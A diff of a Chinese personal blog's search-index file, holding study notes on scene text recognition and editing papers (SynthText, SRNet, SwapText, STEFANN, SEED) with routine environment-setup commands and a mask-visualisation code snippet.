    我们可以通过该对象进行坐标轴范围设置、坐标轴标签设置、坐标轴刻度设置等操作。
    """
    ax = plt.gca()
    ax.set_autoscale_on(False)
    polygons = []
    color = []
    for ann in sorted_anns:
    m = ann['segmentation'] # 获取 mask
    img = np.ones((m.shape[0], m.shape[1], 3))
    color_mask = np.random.random((1, 3)).tolist()[0]
    for i in range(3): # 随机上色
    img[:,:,i] = color_mask[i]
    """
    这行代码使用 matplotlib 库中的 imshow() 函数将图像 img 和常数变量 m * 0.35 在水平方向上连接起来形成一个新的 RGB 图像,
    然后将其显示在坐标轴对象 ax 上。
    更具体地说,np.dstack((img, m * 0.35)) 调用了 numpy 库的 dstack() 函数,
    将两个具有相同形状的二维数组 img 和 m * 0.35 沿着第三个维度(深度)进行堆叠,形成一个新的三维数组。
    其中,第三个维度上的元素依次为 img 对应位置的像素值和 m * 0.35 对应位置的数字,
    因此可以看作是在原始图像的基础上加上了一层颜色偏移。
    ax.imshow() 将这个三维数组作为输入数据,利用默认的参数对图像进行处理,
    包括调整颜色映射、插值方式等等,并将其显示在指定的坐标轴对象上。
    """
    ax.imshow(np.dstack((img, m * 0.35)))
    1
    2
    3
    4
    5
    plt.figure(figsize=(10,10))
    plt.imshow(image)
    show_anns(masks)
    plt.axis('off')
    plt.show()

    png

    ]]>
    @@ -7206,7 +7206,7 @@ /posts/Paper-Synthetic%20Data%20for%20Text%20Localisation%20in%20Natural%20Images/ - 资源

    笔记

    本文介绍了一种在自然图像中检测文本的新方法。该方法包括两个贡献:第一,一种快速可扩展的引擎,用于在杂乱的自然背景图像中生成合成文本图像。该引擎以自然的方式叠加合成的文本到现有的背景图像上,考虑到局部的三维场景几何形态。第二,我们使用合成图像来训练一个完全卷积的神经网络模型,实现自然图像中文本的检测与定位——ChatGPT

    亮点:

    • 提出了一个快速、可扩展的引擎,用于在杂乱的文本中生成合成图像,生成了数据集 Synth Text in the Wild。
    • 在合成图像上训练一个全卷积回归网络(Fully-Convolutional Regression Network, FCRN),该网络在图像的所有位置和多个尺度上有效地执行文本检测和边界盒回归。

    我们的合成引擎(synthetic engine)

    • 真实(realistic)
    • 自动化(automated)
    • 快速(fast)

    **文本生成管道(text generation pipeline)**步骤:

    1. 获取合适的文本和图像样本
      • 文本以三种方式从 Newsgroup20 数据集中提取一一单词、行(最多 3 行)和段落(最多 7 行)
      • 从谷歌图像搜索中提取了 8000 张背景图像,涉及了不同的场景,通过人工检查丢弃包含文本的图像
    2. 基于局部颜色(color)和纹理(texture)线索(cues)将图像分割成连续的区域,使用 [30] 的 CNN 获得密集的逐像素深度图(dense pixel-wise depth map)
      • 对 gPb-UCM 轮廓层次进行阈值处理,获得区域
    3. 对每个相邻区域估计一个局部表面法线
      • 使用 RANSAC 对其拟合平面
    4. 根据区域的颜色选择文本和可选的轮廓的颜色
      • 一旦确定了文本的位置和方向,文本就会被分配一种颜色。
      • 文本的调色板是从 IIIT5K 单词数据集中裁剪的单词图像中学习的。每个裁剪的单词图像中的像素使用 K-means 划分为两组,产生颜色对,其中一种颜色近似前景(文本)颜色,另一种颜色近似背景。在渲染新文本时,选择背景颜色与目标图像区域最匹配的颜色对(在 Lab 色彩空间中使用 L2-norm),并使用相应的前景颜色来渲染文本。
      • 大约 20% 的文本实例被随机选择为具有边框。边界颜色被选择为与前景颜色相同,其值通道增加或减少,或者被选择为前景和背景颜色的平均值。
    5. 使用随机选择的字体渲染文本,并根据局部表面方向进行转换
    6. 使用**泊松图像编辑(poisson image editing)**将文本混合到场景中
      • 保持合成文本图像中的光照梯度,我们使用泊松图像编辑器[35]将文本混合到基础图像上,其引导场定义为公式(12)。我们使用 Raskar 提供的实现有效地解决了这个问题

    代码

    这个项目好像有点旧,像是用 python 2.x 写的……结果我还是装了一个 3.9 的环境,结果代码改半天 orz

    conda create -n SynthText python=3.9

    然后一阵乱装:

    pygame==2.0.0, opencv (cv2), PIL (Image), numpy, matplotlib, h5py, scipy

    Synthetic Data for Text Localisation in Natural Images - Academic Torrents下载一些必要的文件


    我说婷婷!没注意README.md里这句话:

    The code in the branch is for Python2. Python3 is supported in the branch.master python3

    于是转到ankush-me/SynthText at python3 (github.com)下载代码:

    png

    啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊 Windows 下跑不了啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊改天用服务器吧啊啊啊啊啊啊啊啊啊

    AttributeError: module ‘signal’ has no attribute ‘SIGALRM’

    ]]>
    + 资源

    笔记

    本文介绍了一种在自然图像中检测文本的新方法。该方法包括两个贡献:第一,一种快速可扩展的引擎,用于在杂乱的自然背景图像中生成合成文本图像。该引擎以自然的方式叠加合成的文本到现有的背景图像上,考虑到局部的三维场景几何形态。第二,我们使用合成图像来训练一个完全卷积的神经网络模型,实现自然图像中文本的检测与定位——ChatGPT

    亮点:

    • 提出了一个快速、可扩展的引擎,用于在杂乱的文本中生成合成图像,生成了数据集 Synth Text in the Wild。
    • 在合成图像上训练一个全卷积回归网络(Fully-Convolutional Regression Network, FCRN),该网络在图像的所有位置和多个尺度上有效地执行文本检测和边界盒回归。

    我们的合成引擎(synthetic engine)

    • 真实(realistic)
    • 自动化(automated)
    • 快速(fast)

    **文本生成管道(text generation pipeline)**步骤:

    1. 获取合适的文本和图像样本
      • 文本以三种方式从 Newsgroup20 数据集中提取一一单词、行(最多 3 行)和段落(最多 7 行)
      • 从谷歌图像搜索中提取了 8000 张背景图像,涉及了不同的场景,通过人工检查丢弃包含文本的图像
    2. 基于局部颜色(color)和纹理(texture)线索(cues)将图像分割成连续的区域,使用 [30] 的 CNN 获得密集的逐像素深度图(dense pixel-wise depth map)
      • 对 gPb-UCM 轮廓层次进行阈值处理,获得区域
    3. 对每个相邻区域估计一个局部表面法线
      • 使用 RANSAC 对其拟合平面
    4. 根据区域的颜色选择文本和可选的轮廓的颜色
      • 一旦确定了文本的位置和方向,文本就会被分配一种颜色。
      • 文本的调色板是从 IIIT5K 单词数据集中裁剪的单词图像中学习的。每个裁剪的单词图像中的像素使用 K-means 划分为两组,产生颜色对,其中一种颜色近似前景(文本)颜色,另一种颜色近似背景。在渲染新文本时,选择背景颜色与目标图像区域最匹配的颜色对(在 Lab 色彩空间中使用 L2-norm),并使用相应的前景颜色来渲染文本。
      • 大约 20% 的文本实例被随机选择为具有边框。边界颜色被选择为与前景颜色相同,其值通道增加或减少,或者被选择为前景和背景颜色的平均值。
    5. 使用随机选择的字体渲染文本,并根据局部表面方向进行转换
    6. 使用**泊松图像编辑(poisson image editing)**将文本混合到场景中
      • 保持合成文本图像中的光照梯度,我们使用泊松图像编辑器[35]将文本混合到基础图像上,其引导场定义为公式(12)。我们使用 Raskar 提供的实现有效地解决了这个问题

    代码

    这个项目好像有点旧,像是用 python 2.x 写的……结果我还是装了一个 3.9 的环境,结果代码改半天 orz

    1
    conda create -n SynthText python=3.9

    然后一阵乱装:

    1
    pygame==2.0.0, opencv (cv2), PIL (Image), numpy, matplotlib, h5py, scipy

    Synthetic Data for Text Localisation in Natural Images - Academic Torrents下载一些必要的文件


    我说婷婷!没注意README.md里这句话:

    The code in the branch is for Python2. Python3 is supported in the branch.master python3

    于是转到ankush-me/SynthText at python3 (github.com)下载代码:

    png

    啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊 Windows 下跑不了啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊改天用服务器吧啊啊啊啊啊啊啊啊啊

    AttributeError: module ‘signal’ has no attribute ‘SIGALRM’

    ]]>
    @@ -7291,7 +7291,7 @@ /posts/Plan-%E5%AF%B9%E8%AE%BA%E6%96%87%E7%9A%84%E7%9B%AE%E5%89%8D%E6%83%B3%E6%B3%95/ - 主体

    png

    ​ 目前主要的想法还是场景文本编辑这一问题:在自然图像中编辑文本,保留背景和文本的风格。相关工作的论文:

    Editing Text in the Wild

    ​ 发表于《ACM International Conference on Multimedia (MM)》,2019,中国计算机学会推荐国际学术会议(计算机图形学与多媒体)A 类。


    ​ 认为场景文本编辑面临两大挑战:文本样式迁移背景纹理保留

    png

    ​ 提出了一个场景文本的风格保留网络:SRNet,将这个复杂的任务分解为几个更简单、模块化、可联合训练的自网络:


    ​ 在训练过程中,SRNet 将一对图像 $(I_s,I_t)$ 作为输入:

    • $I_s$ 是原样式图像
    • $I_t$ 是目标文本图像

    ​ 输出 $((T_{sk},T_t),T_b,T_f)$:

    • $T_{sk}$ 是目标文本骨架
    • $T_t$ 是与 $I_s$ 具有相同文本样式的前景图像
    • $T_b$ 是背景
    • $T_f$ 最终目标文本图像

    • Text conversion module 文本转换模块(TCM)
      • 使用 FCN
        • 接受输入 $(I_s,I_t)$ ,使用 3 个下采样卷积层和 4 个残差块进行编码特征,然后将两个特征沿深度轴进行拼接
        • 解码时,使用 3 个上采样转置卷积层和 1 个 1 Convolution-BatchNorm-LeakyReLU 输出 $O_t$
      • 引入了骨骼引导的学习机制,从原样式图像 $I_s$ 转移文本样式后,在 $I_t$ 中维护文本骨架,增加一个由 3 个上采样层和 1 个卷积层组成的骨架响应快,再加上一个 sigmoid 激活函数来预测单通道骨架图
    • Background inpainting module 背景修补模块(BIM)
      • 按照“U-Net”的总体架构,以自下而上的特征融合方式,将原有的文字笔画像素擦除,填充适当的纹理,以 $I_s$ 为输入,输出背景图像 $O_b$
      • 输入图像通过 3 个步长为 2 的下采样卷积层进行编码,紧跟 4 个残差块
      • 解码器使用 3 个上采样卷积层生成原始大小的输出图像
      • 加入对抗性学习
    • Fusion module 融合模块
      • 学习如何有效地融合前景信息和背景纹理信息,合成编辑后的文本图像
      • 遵循编码器-解码器 FCN 框架,编码器由 3 个下采样卷积层和残差块组成
      • 解码器由 Convolution-Batch-Norm-LeakyReLU 块生成最终编辑的图像
      • 加入对抗性学习
      • 引入 VGG-Loss,减少失真,使图像更真实,包含感知损失和风格损失

    SwapText:Image Based Texts Transfer in Scenes

    ​ 发表于《IEEE Conference on Computer Vision and Pattern Recognition,2020,中国计算机学会推荐国际学术会议(人工智能)A 类。


    png

    ​ 提出了一种新颖的文本交换网络 SwapText,可以替换场景文本图像中的文本,同时保留原始风格。给定场景文本图像 $I_s\in \mathbb R^{H\times W\times 3}$,目标为输出 $I_c\in\mathbb R^{H\times W\times 3}$ 在保留原始风格的同时,替换文本。包含三个自网络:

    • Text swapping network 文本交换网络

      • 首先从 $I_s$ 中提取风格特征,从 $I_c$ 中提取内容特征,通过 self-attention network 将这个特征结合起来
      • 使用 CSTN 根据风格图像 $I_s$ 的几何属性对内容图像 $I_c$ 进行变换
        • 受文本检测和文本识别中文本形状定义的启发,用 $2K$ 基点 $P={p_1,p_2,…,p_{2K}}$ 来表示
        • 通过薄板样条(TPS)模块对内容图像进行变换

      png

      • 对样式图像和转换后的内容图像进行 3 个下采样卷积层和若干残差块的编码。为了充分结合风格 $F_c$ 和内容特征 $F_s$,我们将它们放入一个 Self-Attention network 中生成特征映射。在解码过程中,使用 3 个上采样反卷积层来生成前景图像 $F_{cs}$。
    • Background completion network 背景补全网络

      • 重构图像 $I_s$ 的原始背景图像 $I_b$,GAN
    • Fusion network 融合网络

      • 将 Text swapping network 和 Background completion network 的输出融合,生成最终图像 $I_t$
      • 引入 VGG-loss

    STEFANN: Scene Text Editor using Font Adaptive Neural Network

    ​ 发表于《IEEE Conference on Computer Vision and Pattern Recognition,2020,中国计算机学会推荐国际学术会议(人工智能)A 类。


    png

    ​ 提出了一个字符级生成模型,限制问题的复杂性,限制在大写、不重叠字符的场景文本上,步骤:

    • 预处理

      • Selection of the source character to be replaced 选择要替换的源字符

        • 使用场景文本识别算法 EAST 初步标记文本区域,手动选择多边形的点来定义单词的文本区域 $\Omega$
      • Generation of the binary target character 生成二值化目标字符

        • 使用 MSER 算法来检测区域 $\Omega$ 中出现的单个字符的二进制掩码输出 $I_M$
        • 根据 $I$ 的二值化图像 $I_B$ 输出最终的二值化图像 $I_c$:$I_c(\mathbf{p})=\left{\begin{matrix}I_M(\mathbf{p})\odot I_B{(\mathbf{p}}) & \mathrm{if}\ \mathbf{p}\in\Omega\ 0 & otherwise\end{matrix}\right.$
    • FANnet

      • 需要两个不同的输入:
        • $64\times 64$ 的源字符图像,3 个卷积层-Flatten-FC1
        • 长度为 $26$ 的目标字符的独热编码 $\mathbf v$,FC2
      • 最后两个 FC 输出其他字母,应用 OSTU,得到二值目标图像
    • Colornet

      • Color transfer 颜色转移
        • 基于 CNN
        • 两种输入:
          • 彩色元字符图像
          • 二值化目标字符图像
      • Character placement 字符放置
      • 从 $I$ 中删除源字符,使用 $W(I_b,\psi)$ 对掩码图像进行重构,以便可以放置生成的目标字符

    想法

    UnrealText:Synthesizing Realistic Scene Text Images from the Unreal World

    png

    ​ 基于 UE4.22 和 UnrealCV 插件实现合成数据集 UnrealText。 在场景文本识别的 SOTA: EAST 上有效

    • Viewfinder module 取景器模块
    • Environment Randomization module 环境随机化模块
    • Text Region Generation module 文本区域生成模块
    • Text Rendering module 文本渲染模块

    在场景文本编辑中引入合成数据集,中文的场景文本数据集较少,尝试合成数据集。

    HENet:Forcing a Network to Think More for Font Recognition

    ​ 发表在 AISS 2021: Sanya, China


    ​ 目前的字体识别网站需要用户交互,而我们提出的网络架构 HENet 是段端到端的。

    png

    Huang et al. [4] propose a font recognizer for Chinese characters and Chinese text blocks, which is made up of a modified inception module and convolutions.

    png

    ​ 三个组件:

    • 特征提取主干

      • 一阵卷
    • HE 块

      • 提出了一个名为 HE Block 的可插拔模块,以提高 HENet 的字体识别精度。HE 块抑制响应值最突出的特征,并迫使网络寻找更复杂的特征,以对类似字体做出正确的预测。
    • 字体分类器

      • 将字体识别视作一个分类问题。

    ​ 提到了引入 transformer,以获得全局和局部的笔画信息。

    在场景文本编辑中作字体识别,直接从字体文件中找到该字体的其他字符,作为字体生成的备用方案。

    ​ 其他:Font Recognition with Deep Learning | by Jehad Mohamed | MLearning.ai | Medium 这个较老,2015 年的,就是卷积神经网络一阵卷。

    Text Recognition in the Wild:A Survey

    见:[Paper-Text Recognition in the Wild-A Survey-Zi-Zi’s Journey](…/…/…/…/2023/03/26/Paper-Text Recognition in the Wild-A Survey/)

    ]]>
    + 主体

    png

    ​ 目前主要的想法还是场景文本编辑这一问题:在自然图像中编辑文本,保留背景和文本的风格。相关工作的论文:

    Editing Text in the Wild

    ​ 发表于《ACM International Conference on Multimedia (MM)》,2019,中国计算机学会推荐国际学术会议(计算机图形学与多媒体)A 类。


    ​ 认为场景文本编辑面临两大挑战:文本样式迁移背景纹理保留

    png

    ​ 提出了一个场景文本的风格保留网络:SRNet,将这个复杂的任务分解为几个更简单、模块化、可联合训练的自网络:


    ​ 在训练过程中,SRNet 将一对图像 $(I_s,I_t)$ 作为输入:

    • $I_s$ 是原样式图像
    • $I_t$ 是目标文本图像

    ​ 输出 $((T_{sk},T_t),T_b,T_f)$:

    • $T_{sk}$ 是目标文本骨架
    • $T_t$ 是与 $I_s$ 具有相同文本样式的前景图像
    • $T_b$ 是背景
    • $T_f$ 最终目标文本图像

    • Text conversion module 文本转换模块(TCM)
      • 使用 FCN
        • 接受输入 $(I_s,I_t)$ ,使用 3 个下采样卷积层和 4 个残差块进行编码特征,然后将两个特征沿深度轴进行拼接
        • 解码时,使用 3 个上采样转置卷积层和 1 个 1 Convolution-BatchNorm-LeakyReLU 输出 $O_t$
      • 引入了骨骼引导的学习机制,从原样式图像 $I_s$ 转移文本样式后,在 $I_t$ 中维护文本骨架,增加一个由 3 个上采样层和 1 个卷积层组成的骨架响应快,再加上一个 sigmoid 激活函数来预测单通道骨架图
    • Background inpainting module 背景修补模块(BIM)
      • 按照“U-Net”的总体架构,以自下而上的特征融合方式,将原有的文字笔画像素擦除,填充适当的纹理,以 $I_s$ 为输入,输出背景图像 $O_b$
      • 输入图像通过 3 个步长为 2 的下采样卷积层进行编码,紧跟 4 个残差块
      • 解码器使用 3 个上采样卷积层生成原始大小的输出图像
      • 加入对抗性学习
    • Fusion module 融合模块
      • 学习如何有效地融合前景信息和背景纹理信息,合成编辑后的文本图像
      • 遵循编码器-解码器 FCN 框架,编码器由 3 个下采样卷积层和残差块组成
      • 解码器由 Convolution-Batch-Norm-LeakyReLU 块生成最终编辑的图像
      • 加入对抗性学习
      • 引入 VGG-Loss,减少失真,使图像更真实,包含感知损失和风格损失

    SwapText:Image Based Texts Transfer in Scenes

    ​ 发表于《IEEE Conference on Computer Vision and Pattern Recognition,2020,中国计算机学会推荐国际学术会议(人工智能)A 类。


    png

    ​ 提出了一种新颖的文本交换网络 SwapText,可以替换场景文本图像中的文本,同时保留原始风格。给定场景文本图像 $I_s\in \mathbb R^{H\times W\times 3}$,目标为输出 $I_c\in\mathbb R^{H\times W\times 3}$ 在保留原始风格的同时,替换文本。包含三个自网络:

    • Text swapping network 文本交换网络

      • 首先从 $I_s$ 中提取风格特征,从 $I_c$ 中提取内容特征,通过 self-attention network 将这个特征结合起来
      • 使用 CSTN 根据风格图像 $I_s$ 的几何属性对内容图像 $I_c$ 进行变换
        • 受文本检测和文本识别中文本形状定义的启发,用 $2K$ 基点 $P={p_1,p_2,…,p_{2K}}$ 来表示
        • 通过薄板样条(TPS)模块对内容图像进行变换

      png

      • 对样式图像和转换后的内容图像进行 3 个下采样卷积层和若干残差块的编码。为了充分结合风格 $F_c$ 和内容特征 $F_s$,我们将它们放入一个 Self-Attention network 中生成特征映射。在解码过程中,使用 3 个上采样反卷积层来生成前景图像 $F_{cs}$。
    • Background completion network 背景补全网络

      • 重构图像 $I_s$ 的原始背景图像 $I_b$,GAN
    • Fusion network 融合网络

      • 将 Text swapping network 和 Background completion network 的输出融合,生成最终图像 $I_t$
      • 引入 VGG-loss

    STEFANN: Scene Text Editor using Font Adaptive Neural Network

    ​ 发表于《IEEE Conference on Computer Vision and Pattern Recognition,2020,中国计算机学会推荐国际学术会议(人工智能)A 类。


    png

    ​ 提出了一个字符级生成模型,限制问题的复杂性,限制在大写、不重叠字符的场景文本上,步骤:

    • 预处理

      • Selection of the source character to be replaced 选择要替换的源字符

        • 使用场景文本识别算法 EAST 初步标记文本区域,手动选择多边形的点来定义单词的文本区域 $\Omega$
      • Generation of the binary target character 生成二值化目标字符

        • 使用 MSER 算法来检测区域 $\Omega$ 中出现的单个字符的二进制掩码输出 $I_M$
        • 根据 $I$ 的二值化图像 $I_B$ 输出最终的二值化图像 $I_c$:$I_c(\mathbf{p})=\left{\begin{matrix}I_M(\mathbf{p})\odot I_B{(\mathbf{p}}) & \mathrm{if}\ \mathbf{p}\in\Omega\ 0 & otherwise\end{matrix}\right.$
    • FANnet

      • 需要两个不同的输入:
        • $64\times 64$ 的源字符图像,3 个卷积层-Flatten-FC1
        • 长度为 $26$ 的目标字符的独热编码 $\mathbf v$,FC2
      • 最后两个 FC 输出其他字母,应用 OSTU,得到二值目标图像
    • Colornet

      • Color transfer 颜色转移
        • 基于 CNN
        • 两种输入:
          • 彩色元字符图像
          • 二值化目标字符图像
      • Character placement 字符放置
      • 从 $I$ 中删除源字符,使用 $W(I_b,\psi)$ 对掩码图像进行重构,以便可以放置生成的目标字符

    想法

    UnrealText:Synthesizing Realistic Scene Text Images from the Unreal World

    png

    ​ 基于 UE4.22 和 UnrealCV 插件实现合成数据集 UnrealText。 在场景文本识别的 SOTA: EAST 上有效

    • Viewfinder module 取景器模块
    • Environment Randomization module 环境随机化模块
    • Text Region Generation module 文本区域生成模块
    • Text Rendering module 文本渲染模块

    在场景文本编辑中引入合成数据集,中文的场景文本数据集较少,尝试合成数据集。

    HENet:Forcing a Network to Think More for Font Recognition

    ​ 发表在 AISS 2021: Sanya, China


    ​ 目前的字体识别网站需要用户交互,而我们提出的网络架构 HENet 是段端到端的。

    png

    Huang et al. [4] propose a font recognizer for Chinese characters and Chinese text blocks, which is made up of a modified inception module and convolutions.

    png

    ​ 三个组件:

    • 特征提取主干

      • 一阵卷
    • HE 块

      • 提出了一个名为 HE Block 的可插拔模块,以提高 HENet 的字体识别精度。HE 块抑制响应值最突出的特征,并迫使网络寻找更复杂的特征,以对类似字体做出正确的预测。
    • 字体分类器

      • 将字体识别视作一个分类问题。

    ​ 提到了引入 transformer,以获得全局和局部的笔画信息。

    在场景文本编辑中作字体识别,直接从字体文件中找到该字体的其他字符,作为字体生成的备用方案。

    ​ 其他:Font Recognition with Deep Learning | by Jehad Mohamed | MLearning.ai | Medium 这个较老,2015 年的,就是卷积神经网络一阵卷。

    Text Recognition in the Wild:A Survey

    见:[Paper-Text Recognition in the Wild-A Survey-Zi-Zi’s Journey](…//Paper-Text Recognition in the Wild-A Survey/)

    ]]>
    @@ -7322,7 +7322,7 @@ /posts/Paper-SEED-Semantics%20Enhanced%20Encoder-Decoder%20Framework%20for%20Scene%20Text%20Recognition/ - 前言

    @全体成员 所有一二年级的同学先读一下这篇论文。咱们本周三组会时请每位同学翻译一段,然后分析一下论文写作的特点。该论文是 2020 年 CVPR 会议论文,本年度的 CVPR 截稿日期为 6 月 20 日,是 CCF 推荐会议,希望各位同学关注会议网站,有准备的同学可以投稿。

    翻译

    Abstract

    ​ 场景文本识别是个研究热点,最近识别模型都是基于 E-D 的框架,可以处理视角失真(perspective distortion)和曲线形状(curve shape)。但它们对模糊(blur)、不均匀的照明(uneven illumination)、不完整的文字(incomplete characters)不好使。我们认为它们不好使的原因是这些 E-D 方法都是基于局部视觉特征(local visual features)没有用显式的语义信息(explicit global semantic information)。我们提出了一个语义增强的 E-D 框架来鲁棒地识别低质量的场景文本。语义信息(semantic information)在 E 中被用在监督,在 D 中被用于初始化。特别地,当前的 SOTA(state-of-the-art)ASTER 算法 也被用在我们所提出的框架中。大量的实验表明,我们这个模型对低质量图像具有鲁棒性。在几个基准数据集上获得 SOTA。代码即将可用。

    1 Introduction

    • convincing performance(令人信服的性能)

    • conventional(传统的)

    • promising results(可喜的结果)

    • background interfere(背景干扰)

    • occlusion(遮挡)

    • regular(常规)

    • each time step(间距)

    • For irregular(不规律的)based text recognition, the rectification(校正)based methods

    • Rectification based methods first rectify the irregular images, then the following pipeline(管道)is as those of regular recognition(规则识别)

    • multi-direction encoding(多向 E)使用带两个 LSTMs 的 CNN 给四个方向编码

    • 2D-attention 使用 2D-attention 机制处理不规则文本,直接处理二维的 feature map

    ​ 如果只把文字识别单纯视作是一个字符分类任务,忽略全局语义,那么对低质量图像识别出来会是依托答辩。


    ​ 语义信息(semantic information)有两个优点:

    • 在 NLP 中可以用 一个词嵌入(a word embedding)来进行监督(supervised)

    • gap(差距)

    • cross-modality task(跨模态任务)

    • concepts(观念)

    • weighted ranking loss(加权排名损失)


    ​ 我们这个模型会预测语义信息,并通过来自预训练的语言模型的单词嵌入来监督。

    • integrate(集成)

    2.1 Scene Text Recognition

    • 传统方法 adopt(采用)a bottom-up approach(方法),先检测和分类字符,然后使用启发式规则(heuristic rules)、语言模型(language models)或词典(lexicons)。整了一堆手工提取的计算成本高(computationally expensive)特征用于 SVM,如纵横比(aspect ratio)、孔面积比(hole area ratio)

    • HOG descriptors(HOG 描述符)

    • Hough voting(Hough 投票机制)


    • treats(视作)

    • character alignment(字符调整)

    • contextual dependencies(上下文相关性)

    • attention drift(注意力漂移)


    ​ 上述方法都假定(assume)文本是水平(horizontal)的,带透视扭曲和曲线就寄。提出了 STN 解决这个问题,还可以用迭代矫正(iterative rectification)和几何约束(geometric constraints)矫正(rectifies),矫正(rectifying)

    • in spite of(尽管)

    • auxiliary dense character(辅助稠密特征)

    • tailored(特制的)

    2.2 Semantics in Scene Text

    • contextualized lexicons(语境化词典)

    • word spotting system(单词识别系统)

    • boost(促进)

    • utilize(应用)

    • integrate(合并)

    • explicitly(准确地)

    3 Method

    3.1 Encoder-Decoder Framework

    • simplicity(简单地)

    • fixed(固定)

    • drawback(缺点)

    • inspired(启发)

    • shortcuts(捷径)

    • capable(能干的)

    3.2 FastText Model

    ​ 设 $T={w_{i-l},…,w_{i+l}}$ 是文本语料库中的一个句子。

    • $l$ 是句子的长度,是一个超参数

    • 单词 $w_i$ 由嵌入向量 $v_i$ 表示,然后输入到简单的前馈神经网络(simple feed-forward neural network)

    • 目的是预测表示为 $C_i=w_{i−l},…,w_{i−1},w_{i+1},…,w_{i + l}$。通过前馈网络的训练,同时对嵌入向量进行优化,最终得到的单词嵌入向量与语义相近的单词接近

    • FastText 还嵌入了子单词(subwords),使用它们生成单词 $w_i$ 的最终嵌入。

    3.3 SEED

    3.3.1 General Framework

    • scenarios(情景)

    • address these problems(解决这些问题)

    • utilizing(使用)

    • alternative(可替代的)

    • fed into(馈送)

    3.3.2 Architecture of Semantics Enhanced ASTER

    • exemplar(模板)

    • transcribes(转录)

    • thin-plate splines(薄板样条)

    • rectified image(矫正图像)

    ​ 编码器的输出是形状为 $L\times C$ 的特征序列 $h=(h_1,…h_L)$,$L$ 是 CNN 中最后一个特征图的宽度,$C$ 是深度。

    ​ 特征序列 $h$ 有两个功能:

    • 通过语义模块预测语义信息

    • 作为 D 的输入

    • 将特征序列平坦化为一维向量 $I$,维数为 $K$,$K=L\times C$,语义信息 $S$ 通过两个线性函数预测 $S=W_2\sigma(W_1I+b_1)+b_2$

    • In particular, the semantic information S is used to initialize the states of GRU after a linear function for transforming the dimension.

      • 特别地,使用语义信息 $S$ 对 GRU 的状态进行初始化,并对维度进行线性函数变换。
    • Instead of using zero-state initializing, the decoding process will be guided with global semantics, so the decoder uses not only local visual information but also global semantic information to generate more accurate results.

      • 解码过程将以全局语义为指导,而不是使用零状态初始化,因此解码器不仅使用局部视觉信息,还使用全局语义信息来生成更准确的结果。

    3.4Loss Function and Training Strategy

    $$L=L_{rec}+\lambda L_{sem}$$

    • $L_{rec}$ 是预测概率相对于 GT 的 standard cross-entropy
    • $L_{sem}$ 是预测的语义信息和从预训练 FastText 模型中转录标签词嵌入和预测语义信息的余弦嵌入损失.

    • two training strategie(策略)
      • 用预训练的 FastText 模型中的词嵌入而不是预测的语义信息初始化 D
      • 直接预测语义信息

    4 Experiments

    4.1 Datasets

    • implementation details(实现细节)

    • benchmarks(基准)

    • cropped(裁切不正的)

    • careful capture(小心捕捉)

    • resolution(分辨率)

    • synthetic(合成)

    • It contains words from the testing set of the IC13 and SVT. 它包含来自 IC13 和 SVT 测试集的单词

    4.2 Implementation Details

    • officially(正式地)

    • symbols(符号)

    • 采用 ADADELTA 最小化目标函数

    • 文本生成任务中常用的解码策略Beam Search(集束搜索)

    • accumulative scores(累积计分)

    4.3 Ablation Study

    • separately(分开)

    • consistently(一贯地)

    • predicted holistic features(预测整体特征)

    • implicit weakly supervised(隐式弱监督)

    4.4 Performance with Inaccurate Bounding Boxes

    • real applications(真正的应用程序)

    • If text recognition is robust to inaccurate detection results, the overall end-to-end performance can be more satisfactory

      • 如果文本识别对不准确的检测结果具有鲁棒性,则整体端到端性能可以更令人满意
    • receptive field(接受域)

    • conduct experiments(进行实验)

    • situation(情况)

    • exemplar(样本)

    • shrink datasets(小数据集)

    • simultaneously(同时地)

    • intersection over union(交集/并集)

    4.5 Generalization of Proposed Framework

    • generalization(泛化性)

    • ntegrate another state-of-the-art recognition method SAR

      • 集成了另一种 SOTA:SAR

    4.6 Qualitative Results and Visualization

    • occlusion(遮挡)

    代码

    Pay20Y/SEED (github.com) 下载代码到系统上,把 requirement.txt 里关于 torch 的删了。

    png

    装!

    pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

    中间会因为装 pycocotools 失败而寄,填之:

    sudo apt-get install gcc build-essential

    继续,然后装 scipy 会寄,从 requirement.txt 里删了它重新装直到没有报错。


    Word vectors for 157 languages · fastText 里下载下载预训练语言模型 cc.en.300.bin

    ]]>
    + 前言

    @全体成员 所有一二年级的同学先读一下这篇论文。咱们本周三组会时请每位同学翻译一段,然后分析一下论文写作的特点。该论文是 2020 年 CVPR 会议论文,本年度的 CVPR 截稿日期为 6 月 20 日,是 CCF 推荐会议,希望各位同学关注会议网站,有准备的同学可以投稿。

    翻译

    Abstract

    ​ 场景文本识别是个研究热点,最近识别模型都是基于 E-D 的框架,可以处理视角失真(perspective distortion)和曲线形状(curve shape)。但它们对模糊(blur)、不均匀的照明(uneven illumination)、不完整的文字(incomplete characters)不好使。我们认为它们不好使的原因是这些 E-D 方法都是基于局部视觉特征(local visual features)没有用显式的语义信息(explicit global semantic information)。我们提出了一个语义增强的 E-D 框架来鲁棒地识别低质量的场景文本。语义信息(semantic information)在 E 中被用在监督,在 D 中被用于初始化。特别地,当前的 SOTA(state-of-the-art)ASTER 算法 也被用在我们所提出的框架中。大量的实验表明,我们这个模型对低质量图像具有鲁棒性。在几个基准数据集上获得 SOTA。代码即将可用。

    1 Introduction

    • convincing performance(令人信服的性能)

    • conventional(传统的)

    • promising results(可喜的结果)

    • background interfere(背景干扰)

    • occlusion(遮挡)

    • regular(常规)

    • each time step(间距)

    • For irregular(不规律的)based text recognition, the rectification(校正)based methods

    • Rectification based methods first rectify the irregular images, then the following pipeline(管道)is as those of regular recognition(规则识别)

    • multi-direction encoding(多向 E)使用带两个 LSTMs 的 CNN 给四个方向编码

    • 2D-attention 使用 2D-attention 机制处理不规则文本,直接处理二维的 feature map

    ​ 如果只把文字识别单纯视作是一个字符分类任务,忽略全局语义,那么对低质量图像识别出来会是依托答辩。


    ​ 语义信息(semantic information)有两个优点:

    • 在 NLP 中可以用 一个词嵌入(a word embedding)来进行监督(supervised)

    • gap(差距)

    • cross-modality task(跨模态任务)

    • concepts(观念)

    • weighted ranking loss(加权排名损失)


    ​ 我们这个模型会预测语义信息,并通过来自预训练的语言模型的单词嵌入来监督。

    • integrate(集成)

    2.1 Scene Text Recognition

